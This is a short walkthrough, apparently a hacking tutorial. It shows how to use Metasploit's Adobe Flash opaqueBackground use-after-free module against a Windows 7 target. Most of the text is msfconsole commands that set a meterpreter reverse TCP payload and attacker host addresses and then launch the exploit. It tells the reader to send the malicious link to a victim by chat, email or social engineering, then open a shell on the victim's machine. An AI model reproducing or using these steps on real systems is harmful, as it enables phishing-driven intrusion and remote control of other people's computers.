This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public on its July 2015 data leak, was described as an Use After Free while handling the opaqueBackground property 7 setter of the flash.display.DisplayObject class. This module is an early release tested on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), IE9 and Adobe Flash Flash 18.0.0.203, Windows 7 SP1 (32-bit), Firefox + Adobe Flash 18.0.0.194, windows 8.1, Firefox and Adobe Flash 18.0.0.203, Windows 8.1, Firefox and Adobe Flash 18.0.0.160, and Windows 8.1, Firefox and Adobe Flash 18.0.0.194
Exploit Targets
Windows 7
Adobe Flash 18.0.0.194
Firefox 38.0.5
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
Now type use exploit/multi/browser/adobe_flash_opaque_background_uaf
msf exploit (adobe_flash_opaque_background_uaf)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_opaque_background_uaf)>set lhost 192.168.0.182 (IP of Local Host)
msf exploit (adobe_flash_opaque_background_uaf)>set srvhost 192.168.0.182
msf exploit (adobe_flash_opaque_background_uaf)>set uripath /
msf exploit (adobe_flash_opaque_background_uaf)>exploit
Now an URL you should give to your victim http://192.168.0.182:8080
Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link (http://192.168.0.182:8080) a session will be opened as shown below
Now type session –l to display sessions opened when the victim opens the link
Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.
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